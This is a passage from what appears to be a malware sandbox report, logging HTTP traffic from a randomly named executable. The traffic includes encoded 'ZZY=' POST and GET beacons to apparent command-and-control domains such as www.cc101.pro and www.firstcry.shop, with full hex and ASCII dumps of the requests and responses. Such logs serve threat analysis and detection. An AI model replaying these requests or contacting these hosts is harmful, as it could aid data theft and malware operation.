                                                                                                                Data Raw: 5a 5a 59 3d 47 50 37 57 6f 45 4c 34 4c 49 44 58 4d 31 42 37 2b 7a 49 73 4b 62 4c 34 61 58 75 6c 4b 6e 48 36 35 64 39 2f 73 79 54 4f 62 76 37 47 4c 64 56 6e 49 64 45 61 43 39 38 74 64 53 5a 32 73 6a 4c 6c 6a 67 47 74 70 64 73 48 64 34 36 43 78 46 37 37 51 58 44 66 50 69 59 4b 68 6d 4a 2f 6e 49 75 72 69 51 55 46 6a 51 47 38 2b 61 74 67 52 31 7a 53 70 6d 5a 7a 43 77 49 77 36 65 53 30 37 34 64 36 37 66 52 77 50 74 7a 66 48 70 55 58 31 75 51 47 44 30 55 67 66 57 75 54 63 4f 6a 58 48 4c 53 5a 73 30 66 5a 6d 69 70 41 79 59 74 76 36 42 54 36 37 65 31 68 30 56 78 6f 41 34 42 4d 51 58 76 4f 4c 7a 6f 4b 2b 7a 70 47 6d 5a 42 41 6e 78 66 67 70 57 6f 2f 6a 54 45 6d 6d 74 5a 57 66 72 78 6b 62 66 66 4a 6f 39 35 71 31 75 30 31 6b 74 51 52 49 36 76 42 6b 36 57 6c 49 78 36 41 57 41 75 38 2f 44 42 61 31 33 6a 6a 73 59 72 62 66 38 58 48 46 67 64 50 49 51 56 76 44 4b 48 50 6f 6a 6b 6f 73 4d 43 4d 39 61 56 68 49 6d 6a 79 6b 2f 6f 71 2f 71 71 73 6d 4b 74 2b 70 50 75 6f 44 35 49 78 79 48 52 57 61 4d 66 45 4f 34 66 58 41 45 [TRUNCATED]
                                                                                                                Data Ascii: ZZY=GP7WoEL4LIDXM1B7+zIsKbL4aXulKnH65d9/syTObv7GLdVnIdEaC98tdSZ2sjLljgGtpdsHd46CxF77QXDfPiYKhmJ/nIuriQUFjQG8+atgR1zSpmZzCwIw6eS074d67fRwPtzfHpUX1uQGD0UgfWuTcOjXHLSZs0fZmipAyYtv6BT67e1h0VxoA4BMQXvOLzoK+zpGmZBAnxfgpWo/jTEmmtZWfrxkbffJo95q1u01ktQRI6vBk6WlIx6AWAu8/DBa13jjsYrbf8XHFgdPIQVvDKHPojkosMCM9aVhImjyk/oq/qqsmKt+pPuoD5IxyHRWaMfEO4fXAEMxEB3Zr+SrDrWOavQHgPQ3JGTWGmHG9e/ZBNJMyKQrlYzbvyy82l367tHNtWc6OExnEhbjCrl0nWqH0WDxzuQJhj3hjVaWD9dDuy6w3EtMQgbHLbuusRByY5/GbWxdi/JtICh6tnhSGGI63gJNKDW12O2XWU4tIksSwVAYhrKUsHULzTQfOMzvfs9XGI+tNAwJAYRYB7X7pj/tk+FFAYECE20Eh3/s5BKG7AgYfvSjIytuPpuVg0uWoJaGBFpzMtt08VeqV85bcZI5yY88GlWhjqmSDFIMJCIlaOZ9HcsUyDHLMNXE69Q3y+NPdPtVTcKX/9K3ak7WHqO9dhjbAqHgxi7Pc5DRulFrfXmF0cmnEZw6z/ak2keBjYIy3JVymwhhg0yN3sPG34Qwdv6VzUU3e+QfUvAr+TcT67/VW/sRv+8u1mt5cwPivst5f3QJVA543pttbW6LRSh1/pdK7V6k/tKTGVyQOU9rJGxyh0IxHprzs9tS/Az+wJTtFT6nIpKdBgtpHeiE3pAhslA4pRRRp1BuWdipQnyGojWNhZGXOQXROzkCfC3ENSY8ksAghh8cEg/NitquB+H1gGkpoPTrhTI1XSLpV4Z38E6bra8ZVViuUKmh+bzWiCVrDJTdXpYrRs8fdIGvRc5WUCHxv4Hzl3LJBGKJXwxw [TRUNCATED]


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.74997613.248.169.48801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:06:14.321759939 CEST416OUTGET /e4x0/?ZZY=LNT2rxv1IZbcC3Jj0QJlS4XPU2WjJkC92LI5ghjdfeHuVtRNJYUfNJ81Qyljm2TCpzqhutEcPP6D5gqXcB7APUAChnFD6LC10hZW5DnCrv8nATu9qGN6LFx4zvr8w5xDip8OL+K5FPsX&mHm0o=rrqhoH HTTP/1.1
                                                                                                                Host: www.firstcry.shop
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Oct 9, 2024 14:06:14.708092928 CEST412INHTTP/1.1 200 OK
                                                                                                                Server: openresty
                                                                                                                Date: Wed, 09 Oct 2024 12:06:14 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 272
                                                                                                                Connection: close
                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 5a 59 3d 4c 4e 54 32 72 78 76 31 49 5a 62 63 43 33 4a 6a 30 51 4a 6c 53 34 58 50 55 32 57 6a 4a 6b 43 39 32 4c 49 35 67 68 6a 64 66 65 48 75 56 74 52 4e 4a 59 55 66 4e 4a 38 31 51 79 6c 6a 6d 32 54 43 70 7a 71 68 75 74 45 63 50 50 36 44 35 67 71 58 63 42 37 41 50 55 41 43 68 6e 46 44 36 4c 43 31 30 68 5a 57 35 44 6e 43 72 76 38 6e 41 54 75 39 71 47 4e 36 4c 46 78 34 7a 76 72 38 77 35 78 44 69 70 38 4f 4c 2b 4b 35 46 50 73 58 26 6d 48 6d 30 6f 3d 72 72 71 68 6f 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZZY=LNT2rxv1IZbcC3Jj0QJlS4XPU2WjJkC92LI5ghjdfeHuVtRNJYUfNJ81Qyljm2TCpzqhutEcPP6D5gqXcB7APUAChnFD6LC10hZW5DnCrv8nATu9qGN6LFx4zvr8w5xDip8OL+K5FPsX&mHm0o=rrqhoH"}</script></head></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.749977188.114.96.3801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:06:19.814477921 CEST665OUTPOST /0r21/ HTTP/1.1
                                                                                                                Host: www.cc101.pro
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.cc101.pro
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.cc101.pro/0r21/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 53 72 34 32 58 52 5a 74 6c 7a 42 54 33 62 75 6c 6e 77 68 4f 44 35 34 37 37 36 77 37 61 73 6b 78 46 61 50 71 6e 47 46 5a 78 49 44 2b 78 43 76 59 65 2f 53 59 47 63 47 4d 53 42 6e 47 6e 51 79 58 33 62 6d 74 62 65 5a 71 67 4f 42 4a 2b 74 4b 47 53 7a 51 70 64 43 50 54 61 64 52 6e 6d 2b 79 75 32 36 33 33 4a 70 2f 2b 56 70 79 4b 30 5a 53 55 47 43 47 50 70 38 39 51 75 32 2f 55 4f 6e 59 64 69 79 6f 65 4b 47 4c 6e 38 41 77 76 74 6b 48 70 54 6f 30 4d 78 33 43 37 4a 4a 48 37 34 53 36 50 62 5a 5a 48 6d 74 42 48 44 66 38 4f 7a 6f 70 63 39 7a 4c 45 4c 6e 59 50 62 41 6a 6c 4a 62 71 6f 6d 6a 61 72 31 47 4a 63 66 39 37 69 37 4b 4b 4e 5a 77 3d 3d
                                                                                                                Data Ascii: ZZY=Sr42XRZtlzBT3bulnwhOD54776w7askxFaPqnGFZxID+xCvYe/SYGcGMSBnGnQyX3bmtbeZqgOBJ+tKGSzQpdCPTadRnm+yu2633Jp/+VpyK0ZSUGCGPp89Qu2/UOnYdiyoeKGLn8AwvtkHpTo0Mx3C7JJH74S6PbZZHmtBHDf8Ozopc9zLELnYPbAjlJbqomjar1GJcf97i7KKNZw==
                                                                                                                Oct 9, 2024 14:06:20.954010963 CEST690INHTTP/1.1 405 Not Allowed
                                                                                                                Date: Wed, 09 Oct 2024 12:06:20 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IOrQ3tnCd59Icrs7zxXIa4Y5izZSw9882pz%2Btxb5JRg1WShwM3wtXkm%2Frml7lLdsU2eB8I18t0hcL0a2BrdoPtuBaItNwATdFJabmGH5EMSV3knYJagrOrZrDrmpnr7a"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8cfe3e78886572b6-EWR
                                                                                                                Data Raw: 39 35 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 95<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.749978188.114.96.3801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:06:22.359015942 CEST685OUTPOST /0r21/ HTTP/1.1
                                                                                                                Host: www.cc101.pro
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.cc101.pro
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.cc101.pro/0r21/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 53 72 34 32 58 52 5a 74 6c 7a 42 54 31 2f 71 6c 30 44 35 4f 55 70 34 36 33 61 77 37 51 4d 6b 74 46 61 4c 71 6e 47 74 7a 77 36 33 2b 30 54 66 59 5a 37 47 59 4b 38 47 4d 59 68 6d 4d 6a 51 79 63 33 62 72 4e 62 66 6c 71 67 4b 70 4a 2b 74 36 47 53 45 45 6d 50 69 50 64 56 39 52 6c 69 2b 79 75 32 36 33 33 4a 70 71 52 56 70 36 4b 30 70 43 55 4a 44 47 4d 6b 63 39 54 6e 57 2f 55 4b 6e 59 5a 69 79 6f 33 4b 43 43 38 38 43 49 76 74 67 4c 70 51 38 41 50 34 33 43 31 4e 4a 47 57 70 69 33 65 43 61 70 49 6e 4c 52 54 61 66 63 2f 32 65 30 2b 6e 52 48 6f 56 32 67 30 66 43 48 54 65 39 33 64 6b 69 65 7a 34 6b 39 39 41 4b 65 49 32 59 72 4a 50 4c 32 37 44 62 32 75 66 62 51 45 54 7a 4c 45 37 48 6c 62 34 4a 45 3d
                                                                                                                Data Ascii: ZZY=Sr42XRZtlzBT1/ql0D5OUp463aw7QMktFaLqnGtzw63+0TfYZ7GYK8GMYhmMjQyc3brNbflqgKpJ+t6GSEEmPiPdV9Rli+yu2633JpqRVp6K0pCUJDGMkc9TnW/UKnYZiyo3KCC88CIvtgLpQ8AP43C1NJGWpi3eCapInLRTafc/2e0+nRHoV2g0fCHTe93dkiez4k99AKeI2YrJPL27Db2ufbQETzLE7Hlb4JE=
                                                                                                                Oct 9, 2024 14:06:23.353688002 CEST692INHTTP/1.1 405 Not Allowed
                                                                                                                Date: Wed, 09 Oct 2024 12:06:23 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oqtoy0cmReJldr0%2FglwLVRTex0YAM7Nh4CU%2Bz5EiGWCKU4Q0pjn7MdaHNDgdPbSWT0pt0ZW4sQCdlIkUG1nVaqzMSJXtssh1qGUYYx1y6EO7%2BX19muTZdse9iyT7GH2N"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8cfe3e884b1f42eb-EWR
                                                                                                                Data Raw: 39 35 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 95<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.749979188.114.96.3801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:06:24.917965889 CEST1698OUTPOST /0r21/ HTTP/1.1
                                                                                                                Host: www.cc101.pro
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.cc101.pro
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.cc101.pro/0r21/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 53 72 34 32 58 52 5a 74 6c 7a 42 54 31 2f 71 6c 30 44 35 4f 55 70 34 36 33 61 77 37 51 4d 6b 74 46 61 4c 71 6e 47 74 7a 77 36 76 2b 6f 78 58 59 5a 5a 75 59 4c 38 47 4d 55 42 6d 50 6a 51 79 64 33 62 7a 42 62 66 70 36 67 4d 74 4a 2f 4d 61 47 55 78 6f 6d 46 69 50 64 65 64 52 6b 6d 2b 7a 36 32 35 4f 77 4a 70 36 52 56 70 36 4b 30 72 4b 55 41 79 47 4d 33 73 39 51 75 32 2f 69 4f 6e 59 68 69 78 59 47 4b 43 47 73 38 79 6f 76 73 41 62 70 63 76 6f 50 67 6e 43 33 4b 4a 47 4f 70 69 36 47 43 62 45 35 6e 4c 4e 35 61 63 4d 2f 33 4a 4a 6a 31 77 2f 2b 55 6d 34 66 65 68 66 31 51 4d 32 68 36 44 53 32 37 55 38 63 45 4b 6d 33 39 37 6e 7a 50 66 6e 6b 55 59 75 68 52 72 63 72 54 6d 44 42 73 32 39 34 72 2b 6d 41 58 59 69 7a 67 38 48 67 77 52 30 6c 41 30 7a 43 4c 58 62 33 67 47 71 38 37 36 5a 37 30 32 72 48 58 6a 43 47 42 62 78 48 56 46 71 67 48 79 53 35 6c 78 39 69 4b 46 2f 57 4e 34 46 45 49 66 67 6a 48 71 51 74 56 48 7a 2f 5a 6c 77 30 6b 2b 59 35 68 4f 62 70 79 31 5a 75 77 31 77 64 6c 53 70 30 4d 53 34 65 2b 47 [TRUNCATED]
                                                                                                                Data Ascii: ZZY=Sr42XRZtlzBT1/ql0D5OUp463aw7QMktFaLqnGtzw6v+oxXYZZuYL8GMUBmPjQyd3bzBbfp6gMtJ/MaGUxomFiPdedRkm+z625OwJp6RVp6K0rKUAyGM3s9Qu2/iOnYhixYGKCGs8yovsAbpcvoPgnC3KJGOpi6GCbE5nLN5acM/3JJj1w/+Um4fehf1QM2h6DS27U8cEKm397nzPfnkUYuhRrcrTmDBs294r+mAXYizg8HgwR0lA0zCLXb3gGq876Z702rHXjCGBbxHVFqgHyS5lx9iKF/WN4FEIfgjHqQtVHz/Zlw0k+Y5hObpy1Zuw1wdlSp0MS4e+GzqFD080FgB//zmyM0rchanYc3t+85ZbQIq1juoLPXG6yCa6RKCUMsRomCgFB7+k0sSNoiP7uycn5wT7O1vpQ+s41Z3cwlYnaBSH6GubOh92PUHXR9p9fb3hqi8pTJ4oDAoMrMY6Un3bfWFFALVubFFKkmTynERs2k4fcle6XNNla4SkaN6trY0G9AJRCg9vh5F/9mzH9f8iMVxOMXyhUDvw2c6RGfai6EZAG4M+o9wyE01nS/pOXwGtmEVO/7SvalFBI4mKbP1tf03Q3Y4DIlS1U9sy0CLtLFUTyJmKahBaFK8dlV1cWpeV5wgu+sz8vOM59PpJfNvcvffVnIA0EcnJe91N3xdVlCi7jk2qhyiAfkPYew+Ta6Fy7g3CRAxTFddpAncXx3fGMPsXPMRkuTNmitVQjssArJaapYt7vFRGZvO/bdPiXFbgDYqFYYk3Y1FolIiWiq8jG/XiedzLpGwECz5EhcYCdb5iP5c27ui0wlJLXg1ra3thG68wcX5j0EvLxpiDCn6la4NlGSS7p8c+CYkx5bhufSLKhZj/So+icBHTlyr2k8SNehq42pfMbRq+rrdI9DceB9QcMJDFsrwCmn8ii/rmi0h/xdfgtl1OoiDlQXc8pWToB7Ty8jnHxpwDl4ehNfWYd6UIxMSqx8HTLyWfLxf3DRE [TRUNCATED]
                                                                                                                Oct 9, 2024 14:06:25.838443995 CEST692INHTTP/1.1 405 Not Allowed
                                                                                                                Date: Wed, 09 Oct 2024 12:06:25 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1sqpAzcvsN2ZnOqDrVNb9lByjwQUKjXt86ho0uZN7zBovmOm95uzHGUZ%2F05lmZpRmnwi3rYwOue8f6R19rpFnZ8yxojHtNUTJZsP1c5BECbwXUYYXon1Dx%2B17Oha%2BNoe"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8cfe3e983b0d42da-EWR
                                                                                                                Data Raw: 39 35 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 95<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.749980188.114.96.3801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:06:27.600434065 CEST412OUTGET /0r21/?mHm0o=rrqhoH&ZZY=fpQWUmUD3QBv9qaBiDNDC55X+pZkXcZKAs7PtWtHybHyzx2AGLiILISraADyo1q+hqHiafFS+6J0wcG7bEgZBkPYVPFAzuLp86jiTbWXEL7WrvfJBC+mpaVtq3e+NG0F9h9/HweK9zd4 HTTP/1.1
                                                                                                                Host: www.cc101.pro
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Oct 9, 2024 14:06:28.510396004 CEST1236INHTTP/1.1 200 OK
                                                                                                                Date: Wed, 09 Oct 2024 12:06:28 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Last-Modified: Tue, 01 Oct 2024 05:45:59 GMT
                                                                                                                Vary: Accept-Encoding
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ZlnfSQCbebPvJq1PiObYHW753anxAOW0iOqsMmA%2Bb0PJwSYH%2BvrJDXSjJA9cnsHTiqkORuctl3WIDrH4Q3SpQ4T2%2Faa5R%2FKnzxXCJWO7faq5YLkistvsyzP%2BU2OsDvO"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8cfe3ea8d85ec472-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                Data Raw: 64 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e e6 ac a2 e8 bf 8e e5 85 89 e4 b8 b4 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 36 65 61 65 62 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 3a 20 32 30 30 70 78 20 61 75 74 6f 20 30 3b 70 61 64 64 69 6e 67 3a 20 30 20 30 20 32 32 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 35 70 78 20 31 35 70 78 20 35 70 78 20 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 62 6f 78 2d 73 68 61 64 [TRUNCATED]
                                                                                                                Data Ascii: de0<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0"><title></title></head><body style="background: #e6eaeb;"><div style="position: relative;margin: 200px auto 0;padding: 0 0 22px;border-radius: 15px 15px 5px 5px;background: #fff;box-shadow: 10px 20px 20px rgba(101, 102, 103, .75);width:95%;max-width: 400px;color: #fff;text-align: center;"><canvas id="canvas" width="200" height="200" style="display:block;position:absolute;top:-100px;left:0;right:0;margin:0 auto;
                                                                                                                Oct 9, 2024 14:06:28.510458946 CEST1236INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 22 3e 3c 2f 63 61 6e 76 61 73 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 32 34 32 34 32 34 3b 66 6f 6e 74 2d 73 69 7a 65
                                                                                                                Data Ascii: background:#fff;border-radius:50%;"></canvas><div style="color: #242424;font-size: 28px;padding:111px 0 20px"></div><div style="margin: 25px 0 14px;color: #7b7b7b;font-size: 18px;">&#65;&#71;&#30452;&#33829;&#32;&#20
                                                                                                                Oct 9, 2024 14:06:28.510499001 CEST1236INData Raw: 78 2e 6c 69 6e 65 57 69 64 74 68 20 3d 20 72 61 73 20 2a 20 30 2e 30 38 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 74 78 2e 73 74 72 6f 6b 65 53 74 79 6c 65 20 3d 20 22 23 64 31 64 32 64 34 22 3b 0a 20 20 20 20 20 20 20
                                                                                                                Data Ascii: x.lineWidth = ras * 0.08; ctx.strokeStyle = "#d1d2d4"; ctx.arc(0, 0, ras * 0.8, 0, Math.PI * 2, false); ctx.stroke(); ctx.strokeStyle = "#00a2ff ";
                                                                                                                Oct 9, 2024 14:06:28.510536909 CEST525INData Raw: 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 69 6e 64 65 78 20 3e 20 36 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 64 65 78 20 2b 3d 20 31 0a 20 20 20 20 20 20 20
                                                                                                                Data Ascii: } else if (index > 60) { index += 1 } else { index += 3 } setTimeout(drawFrame, 20)


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.7499813.33.130.190801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Oct 9, 2024 14:06:33.967888117 CEST695OUTPOST /bp9c/ HTTP/1.1
                                                                                                                Host: www.myjiorooms.services
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.myjiorooms.services
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.myjiorooms.services/bp9c/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
